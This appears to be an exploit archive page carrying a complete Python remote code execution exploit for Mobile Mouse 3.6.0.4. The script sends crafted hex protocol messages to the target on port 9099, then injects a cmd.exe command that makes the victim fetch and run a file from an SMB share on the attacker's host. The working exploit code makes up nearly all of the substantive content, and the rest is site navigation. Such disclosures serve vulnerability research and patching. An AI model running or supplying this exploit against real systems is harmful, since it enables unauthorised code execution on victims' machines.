Mobile Mouse 3.6.0.4 Remote Code Execution

Mobile Mouse 3.6.0.4 Remote Code Execution: Posted May 1, 2023; Authored by Chokri Hammedi; Mobile Mouse version 3.6.0.4 suffers from a remote code execution vulnerability. This exploit is a second version from the original author of the original exploit released in September of 2022.; tags | exploit, remote, code execution; SHA-256 | e7a6810d6a70959199eb39d58ef19ffc0f717838c3bcbb82681904466d5ca0d6; Download | Favorite | View

Mobile Mouse 3.6.0.4 Remote Code Execution

# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2 # Date: Apr
28, 2023

# Exploit Author: Chokri Hammedi

# Vendor Homepage: https://mobilemouse.com/

# Software Link: https://www.mobilemouse.com/downloads/setup.exe

# Version: 3.6.0.4

# Tested on: Windows 10 Enterprise LTSC Build 17763


#!/usr/bin/env python3


import socket

from time import sleep

import argparse

import threading

from impacket import smbserver


def smb_server(lhost, file_to_serve):

    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)

    server.addShare("share", ".", "")

    server.start()


help = " Mobile Mouse 3.6.0.4 Remote Code Execution "

parser = argparse.ArgumentParser(description=help)

parser.add_argument("--target", help="Target IP", required=True)

parser.add_argument("--file", help="File name to Upload", required=True)

parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")


args = parser.parse_args()


host = args.target

command_shell = args.file

lhost = args.lhost

port = 9099 # Default port


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)

s.connect((host, port))



smb_server_thread = threading.Thread(target=smb_server, args=(lhost,
command_shell))

smb_server_thread.start()


CONN =
bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")

s.send(CONN)

run = s.recv(54)


RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")

s.send(RUN)

run = s.recv(54)


sleep(0.5)


payload = f"cmd.exe /c start /B
\\\\{lhost}\\share\\{command_shell}".encode('utf-8')

hex_payload = payload.hex()

SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" +
"4b45591e2d311e454e5445521e04")

s.send(SHELL)

shell = s.recv(96)


print("Take The rose...")


sleep(30)

s.close()

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Mobile Mouse 3.6.0.4 Remote Code Execution

Mobile Mouse 3.6.0.4 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mobile Mouse 3.6.0.4 Remote Code Execution

Share This

Mobile Mouse 3.6.0.4 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems